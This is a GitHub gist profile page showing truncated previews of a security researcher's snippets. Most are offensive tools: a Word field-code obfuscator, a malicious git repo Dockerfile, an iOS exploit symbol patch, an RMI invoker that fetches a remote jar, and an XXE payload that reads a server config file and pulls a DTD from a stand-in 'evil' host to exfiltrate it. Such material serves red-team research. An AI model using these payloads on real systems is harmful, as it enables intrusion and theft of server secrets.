Skip to content

Instantly share code, notes, and snippets.

View staaldraad's full-sized avatar

Etienne Stalmans staaldraad

469 followers · 4 following
View GitHub Profile
@staaldraad
staaldraad / str2quote.py
Last active May 21, 2021 12:49
#!/usr/env/python
print("Converts a string to the {QUOTE} Field code")
st = raw_input("String to convert: ")
v = map(lambda y: "%s"%ord(y),st)
print("{ QUOTE %s }"%' '.join(v))
@staaldraad
staaldraad / Dockerfile
Created September 4, 2018 16:13
Dockerfile to get a malicious git Repository up and running
FROM ubuntu:16.04
RUN apt update ; \
apt install -y git apache2
RUN mkdir /srv/git
COPY git-http.conf .
RUN cat git-http.conf >> /etc/apache2/apache2.conf
@staaldraad
staaldraad / ioctlfilter.c
Created March 21, 2017 13:56
Filters keycodes from R400 presenter in Linux
/* Grabs all input from Logitech R400 presenter and filters to ensure only certain keys are pressed.
* Ensures that only valid R400 keys are pressed and not rogue keys injected.
* Main logic for this found here: http://stackoverflow.com/questions/7668872/need-to-intercept-hid-keyboard-events-and-then-block-them
* Author: Etienne Stalmans <etienne@sensepost.com>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
@staaldraad
staaldraad / async_ios_11_1_2.patch
Last active May 2, 2019 07:02
Add iPhone 6 symbols along with the symbols @cji added for ipad mini 2.
--- async_wake_ios 2/async_wake_ios/symbols.c 2017-12-11 17:01:53.000000000 +0100
+++ async_wake_ios/async_wake_ios/symbols.c 2017-12-13 13:17:32.000000000 +0100
@@ -131,6 +131,50 @@
0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};
+uint64_t ksymbols_iphone_6_15b202[] = {
+ 0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
+ 0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
+ 0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
@staaldraad
staaldraad / docker-compose.yml
Created June 12, 2017 09:17
A docker-compose yml to use with Doorman and osquery
version: '2'
services:
doorman:
image: doorman
container_name: "doorman"
build:
context: ./doorman
dockerfile: Dockerfile_doorman
links:
@staaldraad
staaldraad / pyrmi.py
Last active December 1, 2018 21:09
Quick and dirty RMI invoker
#!/usr/bin/python
"""
Python implementation of RMI invoker. Should try fetch a .jar from a server we control.
Author: Etienne Stalmans <etienne@sensepost.com>
Version: 08/10/2014 - v0.1
"""
import socket
import binascii
@staaldraad
staaldraad / findForms.ps1
Created June 27, 2017 15:17
Add-Type -assembly "Microsoft.Office.Interop.Outlook";
$outlook = New-Object -comobject Outlook.Application;
$mapi = $outlook.GetNamespace("MAPI")
$fld = $outlook.Session.GetDefaultFolder(6);
$t = $fld.GetTable("[MessageClass] = 'IPM.Microsoft.FolderDesign.FormsDescription'",1);
$c = $t.GetRowCount();
while($c -gt 0) {
$r = $t.GetNextRow();
$itm = $mapi.GetItemFromID($r.item(1));
@staaldraad
staaldraad / keybase.md
Created July 2, 2018 20:56

Keybase proof

I hereby claim:

  • I am staaldraad on github.
  • I am staaldraad (https://keybase.io/staaldraad) on keybase.
  • I have a public key ASBLRjbIk9YHmGLclVKxEorNIKsYZgbdW0uh0ugCrhdGYwo

To claim this, I am signing this object:

@staaldraad
staaldraad / Dockerfile
Last active June 6, 2018 14:20
Use Docker to run @sensepost Mana like a hipster
# Mana-toolkit from @sensepost
#
# VERSION 0.1
FROM ubuntu
MAINTAINER Etienne Stalmans, etienne@sensepost.com
RUN apt-get update && apt-get install -y \
unzip \
@staaldraad
staaldraad / xxe
Created July 7, 2014 18:11
XXE remote dtd
Payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>